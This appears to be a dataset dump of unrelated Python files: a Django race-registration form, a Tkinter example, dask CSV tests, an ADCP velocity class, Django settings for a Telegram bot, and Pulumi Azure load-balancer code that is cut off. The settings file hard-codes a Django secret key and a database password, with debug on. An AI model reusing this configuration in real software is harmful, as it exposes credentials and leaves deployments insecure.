date_of_birth = forms.DateField( label = _('Date of Birth'))
nation_code = forms.CharField( max_length=3, required=False, label=_('Nation Code'), widget=forms.TextInput(attrs={'size': 3}) )
gender = forms.ChoiceField( required=False, choices = ((0, _('Men')), (1, _('Women'))), label=_('Gender') )
uci_id = forms.CharField( required=False, label=_('UCIID') )
license_code = forms.CharField( required=False, label=_('License Code') )
category_name = forms.CharField( required=False, label = _('Category') )
team_name = forms.CharField( required=False, label = _('Team') )
confirmed = forms.BooleanField( required=False, label = _('Confirmed') )
license_holder_fields = ('last_name', 'first_name', 'date_of_birth', 'nation_code', 'gender', 'uci_id', 'license_code')
participant_fields = ('confirmed','category_name', 'team_name')
def save( self, request ):
participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
license_holder = participant.license_holder
for a in self.license_holder_fields:
setattr( license_holder, a, self.cleaned_data[a] )
license_holder.save()
for a in self.participant_fields:
if not a.endswith('_name'):
setattr( participant, a, self.cleaned_data[a] )
participant.save()
@classmethod
def get_initial( cls, participant ):
license_holder = participant.license_holder
initial = {}
for a in cls.license_holder_fields:
initial[a] = getattr( license_holder, a )
for a in cls.participant_fields:
if not a.endswith('_name'):
initial[a] = getattr( participant, a )
initial['category_name'] = participant.category_name
initial['team_name'] = participant.team_name
initial['participant_id'] = participant.id
return initial
def changeCategoryCB( self, request ):
participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
return HttpResponseRedirect( pushUrl(request, 'ParticipantCategoryChange', participant.id) )
def changeTeamCB( self, request ):
participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
return HttpResponseRedirect( pushUrl(request, 'ParticipantTeamChange', participant.id) )
def changeNationCodeCB( self, request ):
participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
return HttpResponseRedirect( pushUrl(request, 'LicenseHolderNationCodeChange', participant.license_holder.id) )
def dispatch( self, request ):
for ab in self.additional_buttons:
if ab[3:] and ab[0] in request.POST:
self.save( request )
return ab[3]( request )
def submit_button( self, ab ):
name, value, cls = ab[:3]
return Submit(name, value, css_class = cls + ' hidden-print')
def __init__(self, *args, **kwargs):
participant = kwargs.pop( 'participant', None )
competition = participant.competition
license_holder = participant.license_holder
super(ParticipantConfirmForm, self).__init__(*args, **kwargs)
self.fields['category_name'].widget.attrs['readonly'] = True
self.fields['team_name'].widget.attrs['readonly'] = True
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'form-inline search'
button_args = [
Submit( 'save-submit', _('Save'), css_class = 'btn btn-primary' ),
Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
CancelButton(),
]
change_team = ('change-team-submit', _('Change'), 'btn btn-primary', self.changeTeamCB)
change_nation_code = ('change-nation-code-submit', _('Lookup'), 'btn btn-primary', self.changeNationCodeCB)
change_category = ('change-category-submit', _('Change'), 'btn btn-primary', self.changeCategoryCB)
self.additional_buttons = (change_team, change_nation_code, change_category)
nation_code_error = license_holder.nation_code_error
if not license_holder.uci_id:
uci_id_error = u'missing'
else:
uci_id_error = license_holder.uci_id_error
def warning_html( warning ):
return u'<img src="{}" style="width:20px;height:20px;"/>{}'.format(static('images/warning.png'), warning) if warning else u''
self.helper.layout = Layout(
Row( button_args[0], HTML(' '*8), button_args[1], HTML(' '*8), button_args[2] ),
Row( HTML('<hr/>') ),
Row( HTML('<div style="font-size: 125%;">'), Field('confirmed'), HTML('</div>') ),
Row(
Field('last_name', size=50, css_class='no-highlight'),
Field('first_name', size=20, css_class='no-highlight'),
Field('date_of_birth', size=10, css_class='no-highlight'),
),
Row(
HTML(warning_html(nation_code_error)),
HTML(flag_html(license_holder.nation_code) + ' ' + ioc_country.get(license_holder.nation_code, u'')),
FieldWithButtons(Field('nation_code', css_class='no-highlight'), self.submit_button(change_nation_code) ),
HTML(' '*2), Field('gender', css_class='no-highlight'),
HTML(' '*2), FieldWithButtons(Field('team_name', size=40, css_class='no-highlight'), self.submit_button(change_team) ),
),
Row(
HTML(warning_html(uci_id_error)),
Field('uci_id', size=15, css_class='no-highlight'), Field('license_code', css_class='no-highlight'),
HTML(' '*2), FieldWithButtons(Field('category_name', size=30, css_class='no-highlight'), self.submit_button(change_category) ),
),
Field('participant_id', type='hidden'),
)
@access_validation()
def ParticipantConfirm( request, participantId ):
participant = get_object_or_404( Participant, pk=participantId )
competition_age = participant.competition.competition_age( participant.license_holder )
if request.method == 'POST':
form = ParticipantConfirmForm( request.POST, participant=participant )
if form.is_valid():
form.save( request )
if 'save-submit' in request.POST:
return HttpResponseRedirect( '.' )
if 'ok-submit' in request.POST:
participant.confirmed = True
participant.save()
return HttpResponseRedirect( getContext(request,'cancelUrl') )
return form.dispatch( request )
else:
form = ParticipantConfirmForm( initial=ParticipantConfirmForm.get_initial(participant), participant=participant )
return render( request, 'participant_confirm.html', locals() )
#--------------------------------------------------------------------------------------
@autostrip
class ParticipantNotFoundForm( Form ):
last_name = forms.CharField( label = _('Last Name') )
gender = forms.ChoiceField( choices = ((0, _('Men')), (1, _('Women'))) )
date_of_birth = forms.DateField( label = _('Date of Birth') )
def __init__(self, *args, **kwargs):
from_post = kwargs.pop('from_post', False)
has_matches = kwargs.pop('has_matches', False)
super(ParticipantNotFoundForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'form-inline search'
button_args = [Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' )]
if from_post:
button_args.append( Submit( 'new-submit', _('Not Found - Create New License Holder'), css_class = 'btn btn-success' ) )
button_args.append( CancelButton() )
self.helper.layout = Layout(
Row(
Field('last_name', size=44),
Field('gender'),
Field('date_of_birth'),
),
Row( *button_args ),
)
@access_validation()
def ParticipantNotFound( request, competitionId ):
competition = get_object_or_404( Competition, pk=competitionId )
has_matches = False
matches = []
key = 'participant_not_found'
def set_form_fields( last_name, gender, date_of_birth ):
request.session[key] = {'last_name':last_name, 'gender':gender, 'date_of_birth':date_of_birth.strftime('%Y-%m-%d')}
def get_form_fields():
fields = request.session.get(key, {})
try:
fields['date_of_birth'] = datetime.date( *[int(f) for f in fields['date_of_birth'].split('-')] )
except KeyError:
pass
return fields
if request.method == 'POST':
form = ParticipantNotFoundForm( request.POST, from_post=True )
if form.is_valid():
last_name = form.cleaned_data['last_name']
last_name = last_name[:1].upper() + last_name[1:]
gender = int(form.cleaned_data['gender'])
date_of_birth = form.cleaned_data['date_of_birth']
set_form_fields( last_name, gender, date_of_birth )
if 'search-submit' in request.POST:
matches = LicenseHolder.objects.filter( gender=gender, date_of_birth=date_of_birth, search_text__startswith=utils.get_search_text(last_name) )
secondary_matches = LicenseHolder.objects.filter( search_text__contains=utils.get_search_text(last_name) ).exclude( pk__in=matches.values_list('pk',flat=True) )
has_matches = matches.exists() or secondary_matches.exists()
if has_matches:
form = ParticipantNotFoundForm( initial={'last_name':last_name, 'gender':gender, 'date_of_birth':date_of_birth}, has_matches=has_matches, from_post=True )
return render( request, 'participant_not_found.html', locals() )
if 'new-submit' in request.POST or not has_matches:
license_holder = LicenseHolder( last_name=last_name, first_name=last_name[:1], gender=gender, date_of_birth=date_of_birth )
license_holder.save()
participant = Participant( competition=competition, license_holder=license_holder )
participant.save()
return HttpResponseRedirect( getContext(request,'cancelUrl') +
'ParticipantEdit/{}/'.format(participant.id) +
'LicenseHolderEdit/{}/'.format(license_holder.id)
)
else:
form = ParticipantNotFoundForm( initial=get_form_fields() )
return render( request, 'participant_not_found.html', locals() )
@access_validation()
def ParticipantLicenseHolderFound( request, competitionId, licenseHolderId ):
competition = get_object_or_404( Competition, pk=competitionId )
license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
return HttpResponseRedirect( getContext(request,'pop2Url') +
'ParticipantAddToCompetition/{}/{}/'.format(competition.id, license_holder.id)
)
| [
"[email protected]"
] | |
d6e53802abe18fd58b79466f4e5b581f8311cc8f | b864b992187e2e1c5c8da6fdabeeab5040058fe9 | /Python Example/python 100 examples/064.py | 5d0b0242ccab80007fa668c36eec6b037ee30270 | [] | no_license | Mr-Phoebe/ProgramLanguage | 5384afeef20c8a12cd89cf3720beb0337bd38fc9 | 1588aea62e15304339efb73d55653be1b4e57156 | refs/heads/master | 2023-02-06T11:59:06.272680 | 2023-02-06T04:00:14 | 2023-02-06T04:00:14 | 65,252,634 | 52 | 37 | null | null | null | null | GB18030 | Python | false | false | 630 | py | # -*- coding: UTF-8 -*-
'''
题目:利用ellipse and rectangle 画图。
1.程序分析:
2.程序源代码:
'''
if __name__ == '__main__':
from Tkinter import *
canvas = Canvas(width = 400,height = 600,bg = 'white')
left = 20
right = 50
top = 50
num = 15
for i in range(num):
canvas.create_oval(250 - right,250 - left,250 + right,250 + left)
canvas.create_oval(250 - 20,250 - top,250 + 20,250 + top)
canvas.create_rectangle(20 - 2 * i,20 - 2 * i,10 * (i + 2),10 * ( i + 2))
right += 5
left += 5
top += 10
canvas.pack()
mainloop()
| [
"[email protected]"
] | |
84d1b66a1d65710dbf72630462b771d0caabbd2d | 5a1e5603a42ff27e648fad307d60957cb95f0185 | /dask/dataframe/tests/test_csv.py | 5e6550be7b23c583897a4f98ca267e45c276d05a | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | jseabold/dask | 1937931e7951f776b253432f6b5beedee90892a0 | f6332dec1ead4034540bc2c3c1010a9783099752 | refs/heads/master | 2021-01-23T04:23:10.852740 | 2016-04-29T00:14:34 | 2016-04-29T00:14:34 | 57,442,996 | 0 | 0 | null | 2016-04-30T13:29:31 | 2016-04-30T13:29:30 | Python | UTF-8 | Python | false | false | 6,358 | py | from __future__ import print_function, division, absolute_import
from io import BytesIO
import pytest
pd = pytest.importorskip('pandas')
dd = pytest.importorskip('dask.dataframe')
from toolz import partition_all, valmap, partial
from dask import compute
from dask.async import get_sync
from dask.dataframe.csv import read_csv_from_bytes, bytes_read_csv, read_csv
from dask.dataframe.utils import eq
from dask.utils import filetexts, filetext
compute = partial(compute, get=get_sync)
files = {'2014-01-01.csv': (b'name,amount,id\n'
b'Alice,100,1\n'
b'Bob,200,2\n'
b'Charlie,300,3\n'),
'2014-01-02.csv': (b'name,amount,id\n'),
'2014-01-03.csv': (b'name,amount,id\n'
b'Dennis,400,4\n'
b'Edith,500,5\n'
b'Frank,600,6\n')}
header = files['2014-01-01.csv'].split(b'\n')[0] + b'\n'
expected = pd.concat([pd.read_csv(BytesIO(files[k])) for k in sorted(files)])
def test_bytes_read_csv():
b = files['2014-01-01.csv']
df = bytes_read_csv(b, b'', {})
assert list(df.columns) == ['name', 'amount', 'id']
assert len(df) == 3
assert df.id.sum() == 1 + 2 + 3
def test_bytes_read_csv_kwargs():
b = files['2014-01-01.csv']
df = bytes_read_csv(b, b'', {'usecols': ['name', 'id']})
assert list(df.columns) == ['name', 'id']
def test_bytes_read_csv_dtype_coercion():
b = files['2014-01-01.csv']
df = bytes_read_csv(b, b'', {}, {'amount': 'float'})
assert df.amount.dtype == 'float'
def test_bytes_read_csv_with_header():
b = files['2014-01-01.csv']
header, b = b.split(b'\n', 1)
header = header + b'\n'
df = bytes_read_csv(b, header, {})
assert list(df.columns) == ['name', 'amount', 'id']
assert len(df) == 3
assert df.id.sum() == 1 + 2 + 3
def test_read_csv_simple():
blocks = [[files[k]] for k in sorted(files)]
kwargs = {}
head = bytes_read_csv(files['2014-01-01.csv'], b'', {})
df = read_csv_from_bytes(blocks, header, head, kwargs, collection=True)
assert isinstance(df, dd.DataFrame)
assert list(df.columns) == ['name', 'amount', 'id']
values = read_csv_from_bytes(blocks, header, head, kwargs,
collection=False)
assert isinstance(values, list)
assert len(values) == 3
assert all(hasattr(item, 'dask') for item in values)
result = df.amount.sum().compute(get=get_sync)
assert result == (100 + 200 + 300 + 400 + 500 + 600)
def test_kwargs():
blocks = [files[k] for k in sorted(files)]
blocks = [[b] for b in blocks]
kwargs = {'usecols': ['name', 'id']}
head = bytes_read_csv(files['2014-01-01.csv'], b'', kwargs)
df = read_csv_from_bytes(blocks, header, head, kwargs, collection=True)
assert list(df.columns) == ['name', 'id']
result = df.compute()
assert (result.columns == df.columns).all()
def test_blocked():
blocks = []
for k in sorted(files):
b = files[k]
lines = b.split(b'\n')
blocks.append([b'\n'.join(bs) for bs in partition_all(2, lines)])
df = read_csv_from_bytes(blocks, header, expected.head(), {})
eq(df.compute().reset_index(drop=True),
expected.reset_index(drop=True), check_dtype=False)
expected2 = expected[['name', 'id']]
df = read_csv_from_bytes(blocks, header, expected2.head(),
{'usecols': ['name', 'id']})
eq(df.compute().reset_index(drop=True),
expected2.reset_index(drop=True), check_dtype=False)
def test_enforce_dtypes():
blocks = [[b'aa,bb\n1,1.0\n2.2.0', b'10,20\n30,40'],
[b'aa,bb\n1,1.0\n2.2.0', b'10,20\n30,40']]
head = pd.read_csv(BytesIO(blocks[0][0]), header=0)
dfs = read_csv_from_bytes(blocks, b'aa,bb\n', head, {},
enforce_dtypes=True, collection=False)
dfs = compute(*dfs)
assert all(df.dtypes.to_dict() == head.dtypes.to_dict() for df in dfs)
def test_read_csv_files():
with filetexts(files, mode='b'):
df = read_csv('2014-01-*.csv')
eq(df, expected, check_dtype=False)
fn = '2014-01-01.csv'
df = read_csv(fn)
expected2 = pd.read_csv(BytesIO(files[fn]))
eq(df, expected2, check_dtype=False)
from dask.bytes.compression import compress, files as cfiles, seekable_files
fmt_bs = [(fmt, None) for fmt in cfiles] + [(fmt, 10) for fmt in seekable_files]
@pytest.mark.parametrize('fmt,blocksize', fmt_bs)
def test_read_csv_compression(fmt, blocksize):
files2 = valmap(compress[fmt], files)
with filetexts(files2, mode='b'):
df = read_csv('2014-01-*.csv', compression=fmt, blocksize=blocksize)
eq(df.compute(get=get_sync).reset_index(drop=True),
expected.reset_index(drop=True), check_dtype=False)
def test_warn_non_seekable_files(capsys):
files2 = valmap(compress['gzip'], files)
with filetexts(files2, mode='b'):
df = read_csv('2014-01-*.csv', compression='gzip')
assert df.npartitions == 3
out, err = capsys.readouterr()
assert 'gzip' in err
assert 'blocksize=None' in err
df = read_csv('2014-01-*.csv', compression='gzip', blocksize=None)
out, err = capsys.readouterr()
assert not err and not out
with pytest.raises(NotImplementedError):
df = read_csv('2014-01-*.csv', compression='foo')
def test_windows_line_terminator():
text = 'a,b\r\n1,2\r\n2,3\r\n3,4\r\n4,5\r\n5,6\r\n6,7'
with filetext(text) as fn:
df = read_csv(fn, blocksize=5, lineterminator='\r\n')
assert df.b.sum().compute() == 2 + 3 + 4 + 5 + 6 + 7
assert df.a.sum().compute() == 1 + 2 + 3 + 4 + 5 + 6
def test_late_dtypes():
text = 'a,b\n1,2\n2,3\n3,4\n4,5\n5.5,6\n6,7.5'
with filetext(text) as fn:
df = read_csv(fn, blocksize=5, sample=10)
try:
df.b.sum().compute()
assert False
except TypeError as e:
assert ("'b': float" in str(e) or
"'a': float" in str(e))
df = read_csv(fn, blocksize=5, sample=10,
dtype={'a': float, 'b': float})
assert df.a.sum().compute() == 1 + 2 + 3 + 4 + 5.5 + 6
assert df.b.sum().compute() == 2 + 3 + 4 + 5 + 6 + 7.5
| [
"[email protected]"
] | |
8c69b04818eb1c529b6ad11ac1a9de153b213ba5 | 68747ba592c252c952823ff4973c9508b7c8c5e9 | /Ensemble/BeamVelocity.py | dfcd6b48965024dc062ad756bb54688fbce1a739 | [] | no_license | ricorx7/rti_python-1 | 50ce01e7acf60ad6d57c26cfe5d79ecd1fc84563 | 384edef9c14ae5296d7e123eec473b29905a8a58 | refs/heads/master | 2023-02-01T04:33:48.585793 | 2020-12-16T23:25:22 | 2020-12-16T23:25:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,649 | py | from rti_python.Ensemble.Ensemble import Ensemble
import logging
class BeamVelocity:
"""
Beam Velocity DataSet.
[Bin x Beam] data.
"""
def __init__(self, num_elements, element_multiplier):
"""
Beam Velocity data.
:param num_elements: Number of bins
:param element_multiplier: Number of beams.
"""
self.ds_type = 10
self.num_elements = num_elements
self.element_multiplier = element_multiplier
self.image = 0
self.name_len = 8
self.Name = "E000001\0"
self.Velocities = []
# Create enough entries for all the (bins x beams)
# Initialize with bad values
for bins in range(num_elements):
bins = []
for beams in range(element_multiplier):
bins.append([Ensemble().BadVelocity])
self.Velocities.append(bins)
def decode(self, data):
"""
Take the data bytearray. Decode the data to populate
the velocities.
:param data: Bytearray for the dataset.
"""
packet_pointer = Ensemble.GetBaseDataSize(self.name_len)
for beam in range(self.element_multiplier):
for bin_num in range(self.num_elements):
self.Velocities[bin_num][beam] = Ensemble.GetFloat(packet_pointer, Ensemble().BytesInFloat, data)
packet_pointer += Ensemble().BytesInFloat
logging.debug(self.Velocities)
def encode(self):
"""
Encode the data into RTB format.
:return:
"""
result = []
# Generate header
result += Ensemble.generate_header(self.ds_type,
self.num_elements,
self.element_multiplier,
self.image,
self.name_len,
self.Name)
# Add the data
for beam in range(self.element_multiplier):
for bin_num in range(self.num_elements):
val = self.Velocities[bin_num][beam]
result += Ensemble.float_to_bytes(val)
return result
def encode_csv(self, dt, ss_code, ss_config, blank, bin_size):
"""
Encode into CSV format.
:param dt: Datetime object.
:param ss_code: Subsystem code.
:param ss_config: Subsystem Configuration
:param blank: Blank or first bin position in meters.
:param bin_size: Bin size in meters.
:return: List of CSV lines.
"""
str_result = []
for beam in range(self.element_multiplier):
for bin_num in range(self.num_elements):
# Get the value
val = self.Velocities[bin_num][beam]
# Create the CSV string
str_result.append(Ensemble.gen_csv_line(dt, Ensemble.CSV_BEAM_VEL, ss_code, ss_config, bin_num, beam, blank, bin_size, val))
return str_result
def pd0_mm_per_sec(self, pd0_beam_num: int):
"""
Convert the Beam Velocity from m/s to mm/s and as an integer.
Also remap the Beam numbers to match PD0 beams.
RTB and PD0 do not share the same Beam Order
RTB BEAM 0,1,2,3 = PD0 BEAM 3,2,0,1
:param pd0_beam_num: PD0 Beam number.
:type pd0_beam_num: Integer
:return: A list of all the velocities for the given PD0 beam, converted to mm/s for the beam. The beam will be based on reordering for PD0
:rtype: List or None if beam number is not correct.
"""
# Remap the beam number
# beam order 3,2,0,1
rti_beam_num = 0
if self.element_multiplier == 1: # Vertical beam
rti_beam_num = 0
elif pd0_beam_num == 0:
rti_beam_num = 2
elif pd0_beam_num == 1:
rti_beam_num = 3
elif pd0_beam_num == 2:
rti_beam_num = 1
elif pd0_beam_num == 3:
rti_beam_num = 0
# Replace the RTB BAD_Velocity (88.888) to PD0 BAD_VELOCITY (-32768)
pd0_vel_data = []
for bin_idx in range(self.num_elements):
if Ensemble.is_bad_velocity(self.Velocities[bin_idx][rti_beam_num]):
pd0_vel_data.append(-32768)
else:
pd0_vel_data.append(round(self.Velocities[bin_idx][rti_beam_num] * 1000.0)) # Convert to mm/s and integer
return pd0_vel_data
| [
"[email protected]"
] | |
b35b6265d2f87725bbf04c7a1a015b18573508d8 | db7b618e7d9f7c2af001678e7bc7dd703cb86e61 | /TelegramBot/settings.py | 5bcca8b1e223f39bd5a3ac86c3f826827b3c5348 | [] | no_license | abdullakn/impress.ai | 6f24403b70130d8b6440ceab22931cd1cdcb9aeb | c9033970d33304a306fd6dd5e8cc9c1e39ddf1d8 | refs/heads/master | 2023-08-10T18:07:19.462283 | 2021-09-29T17:27:52 | 2021-09-29T17:27:52 | 411,642,025 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,388 | py | """
Django settings for TelegramBot project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
from decouple import config
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$iep-wj!47lovz7ui4i27t7e5c8d9o$pnmw#@l27sb_t-c5pig'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
TOKEN = config('TOKEN')
TELEGRAM = {
'bot_token': TOKEN,
'channel_name': 'Impress',
}
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'telegramApp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'TelegramBot.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'TelegramBot.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME':'impressDB',
'USER':'postgres',
'PASSWORD':'Abdulla@123',
'HOST':'localhost'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'),]
| [
"[email protected]"
] | |
4a28f0deec15c745ccc4aa180c151746c3d8af36 | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/network/v20181001/load_balancer.py | 0a7b74a91059e38d8ca28b8ffa74b27e5b17a0d9 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,538 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['LoadBalancer']
class LoadBalancer(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backend_address_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BackendAddressPoolArgs']]]]] = None,
etag: Optional[pulumi.Input[str]] = None,
frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]]] = None,
id: Optional[pulumi.Input[str]] = None,
inbound_nat_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatPoolArgs']]]]] = None,
inbound_nat_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatRuleArgs']]]]] = None,
load_balancer_name: Optional[pulumi.Input[str]] = None,
load_balancing_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LoadBalancingRuleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
outbound_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OutboundRuleArgs']]]]] = None,
probes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProbeArgs']]]]] = None,
provisioning_state: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['LoadBalancerSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
LoadBalancer resource
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BackendAddressPoolArgs']]]] backend_address_pools: Collection of backend address pools used by a load balancer
:param pulumi.Input[str] etag: A unique read-only string that changes whenever the resource is updated.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]] frontend_ip_configurations: Object representing the frontend IPs to be used for the load balancer
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatPoolArgs']]]] inbound_nat_pools: Defines an external port range for inbound NAT to a single backend port on NICs associated with a load balancer. Inbound NAT rules are created automatically for each NIC associated with the Load Balancer using an external port from this range. Defining an Inbound NAT pool on your Load Balancer is mutually exclusive with defining inbound Nat rules. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an inbound NAT pool. They have to reference individual inbound NAT rules.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatRuleArgs']]]] inbound_nat_rules: Collection of inbound NAT Rules used by a load balancer. Defining inbound NAT rules on your load balancer is mutually exclusive with defining an inbound NAT pool. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an Inbound NAT pool. They have to reference individual inbound NAT rules.
:param pulumi.Input[str] load_balancer_name: The name of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LoadBalancingRuleArgs']]]] load_balancing_rules: Object collection representing the load balancing rules Gets the provisioning
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OutboundRuleArgs']]]] outbound_rules: The outbound rules.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProbeArgs']]]] probes: Collection of probe objects used in the load balancer
:param pulumi.Input[str] provisioning_state: Gets the provisioning state of the PublicIP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] resource_guid: The resource GUID property of the load balancer resource.
:param pulumi.Input[pulumi.InputType['LoadBalancerSkuArgs']] sku: The load balancer SKU.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backend_address_pools'] = backend_address_pools
__props__['etag'] = etag
__props__['frontend_ip_configurations'] = frontend_ip_configurations
__props__['id'] = id
__props__['inbound_nat_pools'] = inbound_nat_pools
__props__['inbound_nat_rules'] = inbound_nat_rules
if load_balancer_name is None:
raise TypeError("Missing required property 'load_balancer_name'")
__props__['load_balancer_name'] = load_balancer_name
__props__['load_balancing_rules'] = load_balancing_rules
__props__['location'] = location
__props__['outbound_rules'] = outbound_rules
__props__['probes'] = probes
__props__['provisioning_state'] = provisioning_state
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['resource_guid'] = resource_guid
__props__['sku'] = sku
__props__['tags'] = tags
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20150501preview:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20150615:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20160330:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20160601:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20160901:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20161201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170301:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170601:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170801:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170901:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20171001:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20171101:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180101:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180401:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180601:LoadBalancer"), 